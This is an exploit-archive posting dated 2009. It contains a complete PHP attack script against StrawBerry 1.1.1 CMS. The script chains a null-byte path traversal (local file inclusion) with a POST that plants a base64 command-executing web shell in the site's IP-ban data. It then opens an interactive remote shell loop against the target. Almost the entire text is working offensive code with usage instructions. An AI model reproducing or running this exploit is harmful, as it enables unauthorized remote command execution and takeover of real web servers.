strawberry-lfiexec.txt
Posted on 15 May 2009
<?php /********************************************************************* * StrawBerry 1.1.1 LFI / Remote Command Execution Exploit * * Site: http://strawberry.goodgirl.ru/ * ********************************************************************* * magic_quotes_gpc = Off * ********************************************************************* * Author: [AVT] * * Date : 10.05.09 * * My Site: http://antichat.ru/ * *********************************************************************/ set_time_limit(0); error_reporting(0); list($cli,$host,$path) = $argv; if ($argc != 3) { print " o-------------------------------------------------------------o "; print " | StrawBerry 1.1.1 LFI / Remote Command Execution Exploit | "; print " | Site: http://strawberry.goodgirl.ru/ | "; print " o-------------------------------------------------------------o "; print " | Author: [AVT] | "; print " | My Site: http://antichat.ru/ | "; print " o-------------------------------------------------------------o "; print " | Usage: php expl.php [host] [path] | "; print " | host localhost | "; print " | path /news/ | "; print " | Example: php expl.php site.com /news/ | "; print " o-------------------------------------------------------------o "; exit; } if (check_host ()) { post_shell(); } use_shell(); function check_host () { global $host,$path; $data = "GET {$path}example/index.php?do=../../../../db/base/ipban.MYD%00 HTTP/1.1 "; $data .= "Host: $host "; $data .= "Connection: close "; $html = send ($host,$data); if (!stristr($html,'a:')) { print " o-------------------------------------------------------------o "; print " | Exploit Failed! | "; print " o-------------------------------------------------------------o "; exit; } elseif (stristr($html,'<code>')) { return false; } else { return true; } } function send ($host,$data) { if (!$sock = @fsockopen($host,80)) { die("Connection refused, try again! "); } fputs($sock,$data); while (!feof($sock)) { $html .= fgets($sock); } fclose($sock); return $html; } function post_shell() { global $host,$path; $post = "add_ip=" . urlencode('<code><?php passthru(base64_decode($_GET[cmd]));?></code>') . "&action=add&mod=ipban"; $data .= "POST {$path}example/index.php?do=../../../../../inc/mod/ipban.mdu%00 HTTP/1.1 "; $data .= "Host: $host "; $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 "; $data .= "Content-Type: application/x-www-form-urlencoded "; $data .= "Content-Length: ".strlen($post)." "; $data .= "$post "; send ($host,$data); } function use_shell() { while (1) { echo "[Shell]~$: "; $cmd = stripslashes(trim(fgets(STDIN))); if (preg_match('/^(exit|--exit|quit|--quit)$/i',$cmd)) die(" Exited "); print exec_cmd($cmd); } } function exec_cmd($cmd) { global $host,$path; $cmd = base64_encode($cmd); $data .= "GET {$path}example/index.php?cmd={$cmd}&do=../../../../db/base/ipban.MYD%00 HTTP/1.1 "; $data .= "Host: $host "; $data .= "Connection: close "; $html = send ($host,$data); preg_match_all('/<code>(.*)</code>/si', $html, $match); return $match[1][0]; } ?>
